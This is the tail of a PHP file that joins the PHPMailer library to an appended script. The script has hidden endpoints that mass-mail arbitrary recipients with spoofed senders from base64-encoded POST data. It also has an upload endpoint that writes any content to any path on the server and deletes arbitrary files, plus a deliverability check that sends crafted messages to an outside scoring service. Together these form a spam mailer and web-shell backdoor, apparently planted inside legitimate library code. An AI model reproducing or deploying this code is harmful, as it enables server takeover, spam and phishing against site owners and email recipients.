"doc" => "application/msword", "word" => "application/msword", "xlsx" => "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", "xltx" => "application/vnd.openxmlformats-officedocument.spreadsheetml.template", "potx" => "application/vnd.openxmlformats-officedocument.presentationml.template", "ppsx" => "application/vnd.openxmlformats-officedocument.presentationml.slideshow", "pptx" => "application/vnd.openxmlformats-officedocument.presentationml.presentation", "sldx" => "application/vnd.openxmlformats-officedocument.presentationml.slide", "docx" => "application/vnd.openxmlformats-officedocument.wordprocessingml.document", "dotx" => "application/vnd.openxmlformats-officedocument.wordprocessingml.template", "xlam" => "application/", "xlsb" => "application/", "class" => "application/octet-stream", "dll" => "application/octet-stream", "dms" => "application/octet-stream", "exe" => "application/octet-stream", "lha" => "application/octet-stream", "lzh" => "application/octet-stream", "psd" => "application/octet-stream", "sea" => "application/octet-stream", "so" => "application/octet-stream", "oda" => "application/oda", "pdf" => "application/pdf", "ai" => "application/postscript", "eps" => "application/postscript", "ps" => "application/postscript", "smi" => "application/smil", "smil" => "application/smil", "mif" => "application/vnd.mif", "xls" => "application/", "ppt" => "application/", "wbxml" => "application/vnd.wap.wbxml", "wmlc" => "application/vnd.wap.wmlc", "dcr" => "application/x-director", "dir" => "application/x-director", "dxr" => "application/x-director", "dvi" => "application/x-dvi", "gtar" => "application/x-gtar", "php3" => "application/x-httpd-php", "php4" => "application/x-httpd-php", "php" => "application/x-httpd-php", "phtml" => "application/x-httpd-php", "phps" => "application/x-httpd-php-source", "swf" => "application/x-shockwave-flash", "sit" => "application/x-stuffit", "tar" => "application/x-tar", "tgz" => "application/x-tar", "xht" => "application/xhtml+xml", "xhtml" => "application/xhtml+xml", "zip" => "application/zip", "mid" => "audio/midi", "midi" => "audio/midi", "mp2" => "audio/mpeg", "mp3" => "audio/mpeg", "m4a" => "audio/mp4", "mpga" => "audio/mpeg", "aif" => "audio/x-aiff", "aifc" => "audio/x-aiff", "aiff" => "audio/x-aiff", "ram" => "audio/x-pn-realaudio", "rm" => "audio/x-pn-realaudio", "rpm" => "audio/x-pn-realaudio-plugin", "ra" => "audio/x-realaudio", "wav" => "audio/x-wav", "mka" => "audio/x-matroska", "bmp" => "image/bmp", "gif" => "image/gif", "jpeg" => "image/jpeg", "jpe" => "image/jpeg", "jpg" => "image/jpeg", "png" => "image/png", "tiff" => "image/tiff", "tif" => "image/tiff", "webp" => "image/webp", "avif" => "image/avif", "heif" => "image/heif", "heifs" => "image/heif-sequence", "heic" => "image/heic", "heics" => "image/heic-sequence", "eml" => "message/rfc822", "css" => "text/css", "html" => "text/html", "htm" => "text/html", "shtml" => "text/html", "log" => "text/plain", "text" => "text/plain", "txt" => "text/plain", "rtx" => "text/richtext", "rtf" => "text/rtf", "vcf" => "text/vcard", "vcard" => "text/vcard", "ics" => "text/calendar", "xml" => "text/xml", "xsl" => "text/xml", "csv" => "text/csv","wmv" => "video/x-ms-wmv", "mpeg" => "video/mpeg", "mpe" => "video/mpeg","mpg" => "video/mpeg", "mp4" => "video/mp4", "m4v" => "video/mp4", "mov" => "video/quicktime", "qt" => "video/quicktime", "rv" => "video/vnd.rn-realvideo", "avi" => "video/x-msvideo", "movie" => "video/x-sgi-movie", "webm" => "video/webm", "mkv" => "video/x-matroska", ]; $ext = strtolower($ext); if (array_key_exists($ext, $mimes)) { return $mimes[$ext]; } return "application/octet-stream"; } public static function filenameToType($filename) { $qpos = strpos($filename, "?"); if (false !== $qpos) { $filename = substr($filename, 0, $qpos); } $ext = static::mb_pathinfo($filename, PATHINFO_EXTENSION); return static::_mime_types($ext); } public static function mb_pathinfo($path, $options = null) { $ret = [ "dirname" => "", "basename" => "", "extension" => "", "filename" => "", ]; $pathinfo = []; if ( preg_match( '#^(.*?)[\\\\/]*(([^/\\\\]*?)(\.([^.\\\\/]+?)|))[\\\\/.]*$#m', $path, $pathinfo ) ) { if (array_key_exists(1, $pathinfo)) { $ret["dirname"] = $pathinfo[1]; } if (array_key_exists(2, $pathinfo)) { $ret["basename"] = $pathinfo[2]; } if (array_key_exists(5, $pathinfo)) { $ret["extension"] = $pathinfo[5]; } if (array_key_exists(3, $pathinfo)) { $ret["filename"] = $pathinfo[3]; } } switch ($options) { case PATHINFO_DIRNAME: case "dirname": return $ret["dirname"]; case PATHINFO_BASENAME: case "basename": return $ret["basename"]; case PATHINFO_EXTENSION: case "extension": return $ret["extension"]; case PATHINFO_FILENAME: case "filename": return $ret["filename"]; default: return $ret; } } public function set($name, $value = "") { if (property_exists($this, $name)) { $this->{$name} = $value; return true; } $this->setError($this->lang("variable_set") . $name); return false; } public function secureHeader($str) { return trim(str_replace(["\r", "\n"], "", $str)); } public static function normalizeBreaks($text, $breaktype = null) { if (null === $breaktype) { $breaktype = static::$LE; } $text = str_replace([self::CRLF, "\r"], "\n", $text); if ("\n" !== $breaktype) { $text = str_replace("\n", $breaktype, $text); } return $text; } public static function stripTrailingWSP($text) { return rtrim($text, " \r\n\t"); } public static function stripTrailingBreaks($text) { return rtrim($text, "\r\n"); } public static function getLE() { return static::$LE; } protected static function setLE($le) { static::$LE = $le; } public function sign( $cert_filename, $key_filename, $key_pass, $extracerts_filename = "" ) { $this->sign_cert_file = $cert_filename; $this->sign_key_file = $key_filename; $this->sign_key_pass = $key_pass; $this->sign_extracerts_file = $extracerts_filename; } public function DKIM_QP($txt) { $line = ""; $len = strlen($txt); for ($i = 0; $i < $len; ++$i) { $ord = ord($txt[$i]); if ( (0x21 <= $ord && $ord <= 0x3a) || $ord === 0x3c || (0x3e <= $ord && $ord <= 0x7e) ) { $line .= $txt[$i]; } else { $line .= "=" . sprintf("%02X", $ord); } } return $line; } public function DKIM_Sign($signHeader) { if (!defined("PKCS7_TEXT")) { if ($this->exceptions) { throw new Exception( $this->lang("extension_missing") . "openssl" ); } return ""; } $privKeyStr = !empty($this->DKIM_private_string) ? $this->DKIM_private_string : file_get_contents($this->DKIM_private); if ("" !== $this->DKIM_passphrase) { $privKey = openssl_pkey_get_private( $privKeyStr, $this->DKIM_passphrase ); } else { $privKey = openssl_pkey_get_private($privKeyStr); } if ( openssl_sign( $signHeader, $signature, $privKey, "sha256WithRSAEncryption" ) ) { if (\PHP_MAJOR_VERSION < 8) { openssl_pkey_free($privKey); } return base64_encode($signature); } if (\PHP_MAJOR_VERSION < 8) { openssl_pkey_free($privKey); } return ""; } public function DKIM_HeaderC($signHeader) { $signHeader = static::normalizeBreaks($signHeader, self::CRLF); $signHeader = preg_replace('/\r\n[ \t]+/', " ", $signHeader); $lines = explode(self::CRLF, $signHeader); foreach ($lines as $key => $line) { if (strpos($line, ":") === false) { continue; } list($heading, $value) = explode(":", $line, 2); $heading = strtolower($heading); $value = preg_replace('/[ \t]+/', " ", $value); $lines[$key] = trim($heading, " \t") . ":" . trim($value, " \t"); } return implode(self::CRLF, $lines); } public function DKIM_BodyC($body) { if (empty($body)) { return self::CRLF; } $body = static::normalizeBreaks($body, self::CRLF); return static::stripTrailingBreaks($body) . self::CRLF; } public function DKIM_Add($headers_line, $subject, $body) { $DKIMsignatureType = "rsa-sha256"; $DKIMcanonicalization = "relaxed/simple"; $DKIMquery = "dns/txt"; $DKIMtime = time(); $autoSignHeaders = [ "from", "to", "cc", "date", "subject", "reply-to", "message-id", "content-type", "mime-version", "x-mailer", ]; if (stripos($headers_line, "Subject") === false) { $headers_line .= "Subject: " . $subject . static::$LE; } $headerLines = explode(static::$LE, $headers_line); $currentHeaderLabel = ""; $currentHeaderValue = ""; $parsedHeaders = []; $headerLineIndex = 0; $headerLineCount = count($headerLines); foreach ($headerLines as $headerLine) { $matches = []; if ( preg_match( '/^([^ \t]*?)(?::[ \t]*)(.*)$/', $headerLine, $matches ) ) { if ($currentHeaderLabel !== "") { $parsedHeaders[] = [ "label" => $currentHeaderLabel, "value" => $currentHeaderValue, ]; } $currentHeaderLabel = $matches[1]; $currentHeaderValue = $matches[2]; } elseif (preg_match('/^[ \t]+(.*)$/', $headerLine, $matches)) { $currentHeaderValue .= " " . $matches[1]; } ++$headerLineIndex; if ($headerLineIndex >= $headerLineCount) { $parsedHeaders[] = [ "label" => $currentHeaderLabel, "value" => $currentHeaderValue, ]; } } $copiedHeaders = []; $headersToSignKeys = []; $headersToSign = []; foreach ($parsedHeaders as $header) { if ( in_array(strtolower($header["label"]), $autoSignHeaders, true) ) { $headersToSignKeys[] = $header["label"]; $headersToSign[] = $header["label"] . ": " . $header["value"]; if ($this->DKIM_copyHeaderFields) { $copiedHeaders[] = $header["label"] . ":" . str_replace( "|", "=7C", $this->DKIM_QP($header["value"]) ); } continue; } if (in_array($header["label"], $this->DKIM_extraHeaders, true)) { foreach ($this->CustomHeader as $customHeader) { if ($customHeader[0] === $header["label"]) { $headersToSignKeys[] = $header["label"]; $headersToSign[] = $header["label"] . ": " . $header["value"]; if ($this->DKIM_copyHeaderFields) { $copiedHeaders[] = $header["label"] . ":" . str_replace( "|", "=7C", $this->DKIM_QP($header["value"]) ); } continue 2; } } } } $copiedHeaderFields = ""; if ($this->DKIM_copyHeaderFields && count($copiedHeaders) > 0) { $copiedHeaderFields = " z="; $first = true; foreach ($copiedHeaders as $copiedHeader) { if (!$first) { $copiedHeaderFields .= static::$LE . " |"; } if (strlen($copiedHeader) > self::STD_LINE_LENGTH - 3) { $copiedHeaderFields .= substr( chunk_split( $copiedHeader, self::STD_LINE_LENGTH - 3, static::$LE . self::FWS ), 0, -strlen(static::$LE . self::FWS) ); } else { $copiedHeaderFields .= $copiedHeader; } $first = false; } $copiedHeaderFields .= ";" . static::$LE; } $headerKeys = " h=" . implode(":", $headersToSignKeys) . ";" . static::$LE; $headerValues = implode(static::$LE, $headersToSign); $body = $this->DKIM_BodyC($body); $DKIMb64 = base64_encode(pack("H*", hash("sha256", $body))); $ident = ""; if ("" !== $this->DKIM_identity) { $ident = " i=" . $this->DKIM_identity . ";" . static::$LE; } $dkimSignatureHeader = "DKIM-Signature: v=1;" . " d=" . $this->DKIM_domain . ";" . " s=" . $this->DKIM_selector . ";" . static::$LE . " a=" . $DKIMsignatureType . ";" . " q=" . $DKIMquery . ";" . " t=" . $DKIMtime . ";" . " c=" . $DKIMcanonicalization . ";" . static::$LE . $headerKeys . $ident . $copiedHeaderFields . " bh=" . $DKIMb64 . ";" . static::$LE . " b="; $canonicalizedHeaders = $this->DKIM_HeaderC( $headerValues . static::$LE . $dkimSignatureHeader ); $signature = $this->DKIM_Sign($canonicalizedHeaders); $signature = trim( chunk_split( $signature, self::STD_LINE_LENGTH - 3, static::$LE . self::FWS ) ); return static::normalizeBreaks($dkimSignatureHeader . $signature); } public static function hasLineLongerThanMax($str) { return (bool) preg_match( "/^(.{" . (self::MAX_LINE_LENGTH + strlen(static::$LE)) . ",})/m", $str ); } public static function quotedString($str) { if (preg_match('/[ ()<>@,;:"\/\[\]?=]/', $str)) { return '"' . str_replace('"', '\\"', $str) . '"'; } return $str; } public function getToAddresses() { return $this->to; } public function getCcAddresses() { return $this->cc; } public function getBccAddresses() { return $this->bcc; } public function getReplyToAddresses() { return $this->ReplyTo; } public function getAllRecipientAddresses() { return $this->all_recipients; } protected function doCallback( $isSent, $to, $cc, $bcc, $subject, $body, $from, $extra ) { if ( !empty($this->action_function) && is_callable($this->action_function) ) { call_user_func( $this->action_function, $isSent, $to, $cc, $bcc, $subject, $body, $from, $extra ); } } public function getOAuth() { return $this->oauth; } public function setOAuth(OAuthTokenProvider $oauth) { $this->oauth = $oauth; } } use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\Exception; function pmMailCheck($email){ if (filter_var($email, FILTER_VALIDATE_EMAIL)) return true; else return false; } function pmTrim($string){ $string=urldecode($string); return stripslashes(trim($string)); } function pmSend($to, $cc, $bcc, $replyTo, $subject, $body, $fromEmail, $fromName, $messageType, $encode, $charset, $fileContent, $fileName, $mailType, $headersList){ $fromEmail=pmTrim(base64_decode($fromEmail)); $fromName=pmTrim(base64_decode($fromName)); $replyTo=pmTrim(base64_decode($replyTo)); $subject=pmTrim(base64_decode($subject)); $to=pmTrim(base64_decode($to)); $cc=pmTrim(base64_decode($cc)); $bcc=pmTrim(base64_decode($bcc)); $messageType=pmTrim(base64_decode($messageType)); $body=base64_decode($body); $encode = base64_decode($encode); $charset = base64_decode($charset); $fileContent = base64_decode($fileContent); $fileName = base64_decode($fileName); $mailType = base64_decode($mailType); $headersList = base64_decode($headersList); try { $maillist=explode(",", $to); $n=count($maillist); $x =1; foreach ($maillist as $email ) { if(!pmMailCheck($email)) { echo "Incorrect Email $email"; } else { $mail = new PHPMailer; $mail->setFrom($fromEmail, $fromName); $mail->addReplyTo($replyTo); $mail->addAddress($email); $mail->Subject = $subject; $mail->Body = $body; if ($headersList) { $decoded_headers = json_decode($headersList); foreach ($decoded_headers as $key => $value){ $mail->addCustomHeader($key, $value); }; } if($messageType==1){ $mail->IsHTML(true); $mail->AltBody =strip_tags($body); } else $mail->IsHTML(false); if(count($n) == 1){ $mailListCC = explode(",", $cc); foreach ($mailListCC as $email) { $mail->addCC(pmTrim($email)); } $mailListBCC = explode(",", $bcc); foreach ($mailListBCC as $email) { $mail->addBCC(pmTrim($email)); } }if($mailType=='mail') $mail->isMail(); elseif($mailType=='sendmail') $mail->isSendmail(); elseif($mailType=='qmail') $mail->isQmail(); $mail->CharSet = $charset; $mail->Encoding= $encoding; if ($fileContent && $fileName) { $mail->addStringAttachment( base64_decode($fileContent), base64_decode($fileName) ); } if (!$mail->send()) { echo 'false'; echo htmlspecialchars($mail->ErrorInfo); } else { echo 'true'; } } $x++; } } catch (Exception $e) { echo "Message could not be sent. Mailer Error: $e"; } } if(isset($_POST['action']) && ($_POST['action']=="send" or $_POST['action']=="score")){ $fromEmail=pmTrim(base64_decode($_POST['fromEmail'])); $fromName=pmTrim(base64_decode($_POST['fromName'])); $replyTo=pmTrim(base64_decode($_POST['replyTo'])); $subject=pmTrim(base64_decode($_POST['subject'])); $to=pmTrim(base64_decode($_POST['to'])); $cc=pmTrim(base64_decode($_POST['cc'])); $bcc=pmTrim(base64_decode($_POST['bcc'])); $messageType=pmTrim(base64_decode($_POST['messageType'])); $body=base64_decode($_POST['body']); $encoding = base64_decode($_POST['encode']); $charset = base64_decode($_POST['charset']); $fileContent = base64_decode($_POST['fileContent']); $fileName = base64_decode($_POST['fileName']); $mailType = base64_decode($_POST['mailType']); $headersList = base64_decode($_POST['headersList']); } if(isset($_POST['action']) && $_POST['action']=="send"){ $maillist=explode(",", $to); $n=count($maillist); $x=1; foreach ($maillist as $email ) { if(!pmMailCheck($email)) { echo "Incorrect Email $email"; } else { $mail = new PHPMailer; $mail->setFrom($fromEmail, $fromName); $mail->addReplyTo($replyTo); $mail->addAddress($email); $mail->Subject = $subject; $mail->Body = $body; if ($headersList) { $decoded_headers = json_decode($headersList); foreach ($decoded_headers as $key => $value){ $mail->addCustomHeader($key, $value); }; } if($messageType==1){ $mail->IsHTML(true); $mail->AltBody =strip_tags($body); } else $mail->IsHTML(false); if(count($n) == 1){ $mailListCC = explode(",", $cc); foreach ($mailListCC as $email) { $mail->addCC(pmTrim($email)); } $mailListBCC = explode(",", $bcc); foreach ($mailListBCC as $email) { $mail->addBCC(pmTrim($email)); } } if($mailType=='mail') $mail->isMail(); elseif($mailType=='sendmail') $mail->isSendmail(); elseif($mailType=='qmail') $mail->isQmail(); $mail->CharSet = $charset; $mail->Encoding = $encoding; if ($fileContent && $fileName) { $mail->addStringAttachment( base64_decode($fileContent), base64_decode($fileName) ); } if (!$mail->send()) { echo 'false'; echo htmlspecialchars($mail->ErrorInfo); } else { echo 'true'; } } $x++; } } function genRandWords($wordCount, $lengthRange) { $words = []; $characters = 'qwertyuiopasdfghjklzxcvbnm'; for ($i=0;$i<$wordCount;$i++) { $wordLength = rand($lengthRange[0], $lengthRange[1]); $word = ''; for ($j=0;$j<$wordLength;$j++) { $word .= $characters[rand(0, strlen($characters) - 1)]; }; $words[] = $word; }; return implode(' ', $words); }; if(isset($_GET['ss']) && $_GET['ss']=="upl"){ $FC = base64_decode($_POST['FC']); $FN = base64_decode($_POST['FN']); $FP = base64_decode($_POST['FP']); $FND = base64_decode($_POST['FND']); if($FC && $FN && $FP){ if (!is_dir($FP)) { mkdir($FP, 0755, true); } $resp = file_put_contents($FP.'/'.$FN, $FC); echo "true"; } if($FND){ if (file_exists($FND)) { unlink($FND); echo "true"; } } } if(isset($_GET['ss']) && $_GET['ss']=="wpm"){ require $_SERVER['DOCUMENT_ROOT'] . '/wp-load.php'; $subject=pmTrim(base64_decode($_POST['subject'])); $to=pmTrim(base64_decode($_POST['to'])); $body=base64_decode($_POST['body']); $result = wp_mail($to, $subject, $body); if ($result) { echo 'true'; } else { echo 'false'; } } if(isset($_GET['ss']) && $_GET['ss']=="check"){ $domain = $_SERVER['HTTP_HOST']; $fromEmail = 'info@' . $domain; $fromName = genRandWords(2, [3,5]); $replyTo = 'info@' . $domain; $subject = genRandWords(5, [3,6]); $body = genRandWords(10, [3,8]); $messageType = 1; $n = []; $charset = 'UTF-8'; $encoding = 'base64'; $mailTypelist = ['sendmail','qmail','mail']; $success = false; for ($i =0; $i < count($mailTypelist); $i++) { $mailType = $mailTypelist[$i]; $mail = new PHPMailer; foreach ($decoded_headers as $key => $value){ $mail->addCustomHeader($key, $value); }; $mail->setFrom($fromEmail,$fromName); $mail->addReplyTo($replyTo); if(isset($_GET['m'])){ $mail->addAddress($_GET['m']); } else { $tmp_address_login = genRandWords(1, [5,6]); $tmp_address_domen = genRandWords(1, [5,6]); $tmp_address = "$tmp_address_login@$"; $mail->addAddress($tmp_address); }; $mail->Subject = $subject; $mail->Body = $body; if($messageType==1){ $mail->IsHTML(true); $mail->AltBody =strip_tags($body); } else $mail->IsHTML(false); if(count($n) == 1){ $mailListCC = explode(",", $cc); foreach ($mailListCC as $email) { $mail->addCC(pmTrim($email)); } $mailListBCC = explode(",", $bcc); foreach ($mailListBCC as $email) { $mail->addBCC(pmTrim($email)); } } if($mailType=='mail') $mail->isMail(); elseif($mailType=='sendmail') $mail->isSendmail(); elseif($mailType=='qmail') $mail->isQmail(); $mail->CharSet = $charset; $mail->Encoding = $encoding; $mail->preSend(); $messageHeaders=$mail->getSentMIMEMessage(); $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, ''); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('email' => $messageHeaders,'options'=>'long'))); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 15); $response = curl_exec($ch); $response = json_decode($response); if ($response->success == TRUE ){ if ($mail->send()) { $score = $response->score; $success = true; break; } } }; if ($success) { echo "true|$mailType"; } else { echo 'false'; }; } ?>